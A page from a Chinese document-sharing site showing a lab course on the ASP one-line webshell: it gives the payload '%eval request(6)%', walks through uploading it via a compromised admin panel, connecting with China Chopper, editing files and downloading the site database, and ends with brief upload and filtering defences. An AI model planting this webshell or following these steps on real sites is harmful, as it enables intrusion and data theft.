L003001041-一句话木的马测试分析.docVIP

  1. 1、本文档共23页,可阅读全部内容。
  2. 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  5. 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  6. 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  7. 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  8. 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
L003001041-一句话木的马测试分析

?课程编写 类别 内容 实验课题名称 L003001041-一句话木马测试分析 实验目的与要求 熟悉一句话木马的原理,掌握一句话木马的使用以及防御方法 实验环境 VPC1(虚拟PC) 操作系统类型:windows server 2003和windows XP professional,网络接口:本地连接 VPC1?连接要求 PC?网络接口,本地连接与实验网络直连 软件描述 中国菜刀 实验环境描述 1、?学生机与实验室网络直连; 2、?VPC1与实验室网络直连; 3、?学生机与VPC1物理链路连通; 预备知识 黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码: %execute request(value)% 其中value是值,所以你可以更改自己的值,前面的request就是获取这个值 %eval request(value)%(现在比较多见的,而且字符少,对表单字数有限制的地方特别的实用) 当知道了数据库的URL,就可以利用本地一张网页进行连接得到Webshell。(不知道数据库也可以,只要知道%eval request(value)%这个文件被插入到哪一个ASP文件里面就可以了。) 这就被称为一句话木马,它是基于B/S结构的。 实验内容 理解该漏洞的实现过程 实验步骤 ???学生登录实验场景的操作 学生单击 “网络拓扑”进入实验场景,单击windows2003中的“打开控制台”按钮,进入目标主机。如图所示: 我们把windows2003机器作为服务机(ip地址为192.168.1.154,不固定) 2、学生输入账号Administrator ,密码123456,登录到实验场景中的Windows server 2003,在该机器上搭建一个网站,并且能够正常访问。如图所示: 3、学生输入账号Administrator ,密码123456,登录到实验场景中的Windows XP Professional。如图所示: 4.打开windows 2003上的网站,我们通过名小子或者啊D获取到了后台地址(这两个工具的使用方法可以参考明小子和啊Dsql注入实例),以及用户名和密码(均是admin),然后登陆进去。如图所示: 5.然后看到左边有一个文件上传菜单,点击它。如图所示: 6.接下来我们可以在本地创建一个包含有一个一句话木马的asp文件。内容为“%eval request(6)%”,其中小括号里的6是咱们连接一句话的密码,密码也可以自行设置。如图所示: 7.将刚才新建的文档,重命名为7.asp。如图所示: 8.然后回到后台,单机浏览,选择刚才新建的7.asp文件。如图所示: 9.点击打开后,进行上传,标题出写为8,并点击提交按钮。如图所示: 10. 提交完成后,就可以看到7.asp的保存路径了。如图所示: 11.然后我们在浏览器里进行访问。如图所示: 12.此处一片空白,说明我们上传的木马上传成功并可以执行。然后打开中国菜刀进行连接。进入到D:\tools文件夹,打开chopper.exe。如图所示: 13.默认情况下,中国菜刀自己会有几个示例。我们右击空白处,选择添加。如图所示: 14.把刚才访问asp文件的地址放进地址栏,右侧输入连接密码“6”。下方默认类别不用改,脚本类型我们选择asp(Eval)类型,字符编码选择GB2312。如图所示: 15.添加完毕后,我们右击该记录,然后选择文件管理。如图所示: 16.接下来我们就会连接到刚才上传07.asp文件的目录。如图所示: 17.我们可以进入网站根目录article,可以编辑任何文件,右击要编辑的文件。如图所示: 18.会打开一个新的编辑框,编辑完后点击上方的保存按钮即可。 19.另外还可以进行上传下载文件,比如我们可以将测试网站的数据库article数据库下载下来。右击article.mdb,选择下载文件。如图所示: 20.接下来选择要保存article.mdb的路径,保存到桌面上,然后点击保存。 21.接下来待会就可以看到article.mdb保存到桌面上了。如图所示: 22.另外我们通过中国菜刀还可以看到其他盘符的内容。 23.关于此类攻击手段的防护措施: 23.1禁止上传脚本文件,并对上传文件夹的目录的执行脚本禁止掉。 23.2另外就是网站开发人员,对get和post提交的内容中的execute,eval等内容进行过滤。 ?

文档评论(0)

liwenhua00 + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档